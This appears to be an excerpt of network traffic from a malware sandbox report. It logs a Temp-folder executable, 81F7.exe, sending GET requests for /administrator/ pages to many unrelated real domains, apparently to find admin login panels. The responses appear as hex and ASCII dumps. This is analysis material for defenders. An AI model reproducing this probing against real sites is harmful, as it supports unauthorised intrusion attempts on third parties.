Feb 21, 2024 00:26:06.915535927 CET	681	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:06 GMT Server: Apache Strict-Transport-Security: max-age=31536000; includeSubDomains X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: same-origin Location: https://iisalessandrini.edu.it/administrator/ Content-Length: 253 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 69 73 61 6c 65 73 73 61 6e 64 72 69 6e 69 2e 65 64 75 2e 69 74 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://iisalessandrini.edu.it/administrator/">here</a>.</p></body></html>
Feb 21, 2024 00:26:06.917025089 CET	191	OUT	GET /administrator/index.php HTTP/1.1 Host: iisalessandrini.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:07.097044945 CET	699	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:06 GMT Server: Apache Strict-Transport-Security: max-age=31536000; includeSubDomains X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: same-origin Location: https://iisalessandrini.edu.it/administrator/index.php Content-Length: 262 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 69 73 61 6c 65 73 73 61 6e 64 72 69 6e 69 2e 65 64 75 2e 69 74 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://iisalessandrini.edu.it/administrator/index.php">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.6	52333	198.185.159.145	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.736905098 CET	178	OUT	GET /administrator/ HTTP/1.1 Host: publichouse.ie Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.847265959 CET	283	IN	HTTP/1.1 301 Moved Permanently Age: 0 Date: Tue, 20 Feb 2024 23:26:06 GMT Location: https://www.publichouse.ie/administrator/ Server: Squarespace Set-Cookie: crumb=BejL2LT8df0oZDhjMTJjMWIyMTBiYmViMDRjODkzYTJkMWVlZWNi;Path=/ X-Contextid: keYvR01k/mSptuD5f Content-Length: 0
Feb 21, 2024 00:26:06.851022005 CET	255	OUT	GET /administrator/index.php HTTP/1.1 Host: publichouse.ie Accept: / Accept-Encoding: deflate, gzip Cookie: crumb=BejL2LT8df0oZDhjMTJjMWIyMTBiYmViMDRjODkzYTJkMWVlZWNi User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.942236900 CET	1276	IN	HTTP/1.1 404 Not Found Cache-Control: no-cache, must-revalidate Content-Length: 77570 Content-Type: text/html; charset=UTF-8 Date: Tue, 20 Feb 2024 23:26:06 UTC Expires: Thu, 01 Jan 1970 00:00:00 UTC Pragma: no-cache Server: Squarespace X-Contextid: keYvR01k/iofNqQGN Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 Data Ascii: <!DOCTYPE html><head> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em; font-weight: 300; c
Feb 21, 2024 00:26:06.942248106 CET	1276	IN	Data Raw: 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 Data Ascii: olor: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family: 'Clarkson'; font-
Feb 21, 2024 00:26:06.942301035 CET	1276	IN	Data Raw: 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34 31 75 6f 5a 46 46 49 77 58 30 76 79 48 75 45 6a 48 59 48 32 56 6d 72 Data Ascii: LWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMttrEh8jq70i9RKy000O7s/J2
Feb 21, 2024 00:26:06.942310095 CET	268	IN	Data Raw: 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75 59 51 4c 64 5a 47 75 47 6a 75 6d 36 37 4f 36 76 73 34 70 7a 6e 4e 4e Data Ascii: xqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+rKdvVh6f1F0Y/zD8P1sa53N
Feb 21, 2024 00:26:06.942344904 CET	1276	IN	Data Raw: 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a 6d 6b 31 33 69 51 68 5a 70 56 76 77 57 61 65 4a 4a 76 5a 77 6d 5a 66 Data Ascii: 4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS5yocFv2WSejEdfhwp5nBV/y
Feb 21, 2024 00:26:06.942368984 CET	1276	IN	Data Raw: 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a 31 4b 74 35 6c 47 73 76 61 68 79 6a 4d 75 52 56 48 49 4e 4b 49 41 53 Data Ascii: b3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFIiJPGPnKHYK2JjCRhQbe7Dxt
Feb 21, 2024 00:26:06.942388058 CET	1276	IN	Data Raw: 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77 2f 4d 30 39 6b 66 67 47 63 66 7a 42 4f 77 72 79 52 61 56 44 73 36 44 Data Ascii: JIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2uE5F6+znJOlnPHleN2O10143
Feb 21, 2024 00:26:06.942451000 CET	1276	IN	Data Raw: 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79 78 47 4f 70 71 4a 4c 78 51 45 50 50 38 65 62 6b 68 32 78 6a 78 50 73 Data Ascii: ZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3jzHBrGuPR1YpMFFrB1bJ8us
Feb 21, 2024 00:26:06.942460060 CET	1276	IN	Data Raw: 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53 6d 38 78 79 37 34 61 37 52 49 71 32 52 79 68 4c 4c 71 34 76 45 4e 78 Data Ascii: KKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOYMOd3ZMy3lBovUZqA+G9Ip1V
Feb 21, 2024 00:26:06.942490101 CET	1276	IN	Data Raw: 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73 59 57 74 62 4f 4d 45 64 72 4b 62 50 65 78 6c 48 77 64 34 48 69 2f 67 Data Ascii: W9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBWNubh73czs77OmucVf3h6/Pn
Feb 21, 2024 00:26:07.030833006 CET	1276	IN	Data Raw: 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37 59 36 63 35 53 4e 6e 32 63 68 5a 4c 72 37 35 4d 79 53 4d 55 44 65 44 Data Ascii: /qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMfwYCj9K4ceU8KMt/MiGH+nwo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.6	52281	104.21.66.152	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.737606049 CET	174	OUT	GET /administrator/ HTTP/1.1 Host: att.com.tw Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.6	52282	104.21.66.152	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.738912106 CET	174	OUT	GET /administrator/ HTTP/1.1 Host: att.com.tw Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.6	52334	103.224.182.253	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.740106106 CET	177	OUT	GET /administrator/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.907068968 CET	432	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:06 GMT server: Apache set-cookie: __tad=1708471566.1447398; expires=Fri, 17-Feb-2034 23:26:06 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 137 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 25 8e 41 12 c2 30 0c 03 cf f8 15 26 9c 43 78 80 9b 03 3f 71 db 94 16 02 e9 04 c3 d0 df e3 c6 3a 49 9e d1 5a 34 cb 33 47 00 9a 13 8f 11 48 16 c9 29 4e f5 cc 1f 0a 16 80 de 43 5d 56 41 d9 d6 d4 39 49 3f 09 77 fe b2 5d 9d 96 81 82 05 f3 86 52 d7 97 71 c3 fe 36 94 5c 6a e7 4e 53 93 c3 9d a0 f1 d2 a4 fd 03 1d bd c7 6b e6 d7 03 d1 7b 7d 18 f6 66 6c 2c 9b 07 7f 28 5c 82 ab a8 00 00 00 Data Ascii: %A0&Cx?q:IZ43GH)NC]VA9I?w]Rq6\jNSk{}fl,(\

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.6	52335	103.224.182.253	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.740372896 CET	177	OUT	GET /administrator/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.907718897 CET	432	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:06 GMT server: Apache set-cookie: __tad=1708471566.1141811; expires=Fri, 17-Feb-2034 23:26:06 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 137 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 25 8e 41 12 c2 30 0c 03 cf f8 15 26 9c 43 78 80 9b 03 3f 71 db 94 16 02 e9 04 c3 d0 df e3 c6 3a 49 9e d1 5a 34 cb 33 47 00 9a 13 8f 11 48 16 c9 29 4e f5 cc 1f 0a 16 80 de 43 5d 56 41 d9 d6 d4 39 49 3f 09 77 fe b2 5d 9d 96 81 82 05 f3 86 52 d7 97 71 c3 fe 36 94 5c 6a e7 4e 53 93 c3 9d a0 f1 d2 a4 fd 03 1d bd c7 6b e6 d7 03 d1 7b 7d 18 f6 66 6c 2c 9b 07 7f 28 5c 82 ab a8 00 00 00 Data Ascii: %A0&Cx?q:IZ43GH)NC]VA9I?w]Rq6\jNSk{}fl,(\

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.6	52336	62.210.211.126	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.746628046 CET	188	OUT	GET /administrator/ HTTP/1.1 Host: voltage-distribution.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.905191898 CET	573	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:06 GMT Server: Apache/2.4.41 (Ubuntu) Location: https://voltage-distribution.com/administrator/ Content-Length: 345 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 76 6f 6c 74 61 67 65 2d 64 69 73 74 72 69 62 75 74 69 6f 6e 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 76 6f 6c 74 61 67 65 2d 64 69 73 74 72 69 62 75 74 69 6f 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://voltage-distribution.com/administrator/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at voltage-distribution.com Port 80</address></body></html>
Feb 21, 2024 00:26:06.906533003 CET	197	OUT	GET /administrator/index.php HTTP/1.1 Host: voltage-distribution.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:07.065536022 CET	591	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:06 GMT Server: Apache/2.4.41 (Ubuntu) Location: https://voltage-distribution.com/administrator/index.php Content-Length: 354 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 76 6f 6c 74 61 67 65 2d 64 69 73 74 72 69 62 75 74 69 6f 6e 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 76 6f 6c 74 61 67 65 2d 64 69 73 74 72 69 62 75 74 69 6f 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://voltage-distribution.com/administrator/index.php">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at voltage-distribution.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.6	52344	217.70.184.38	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
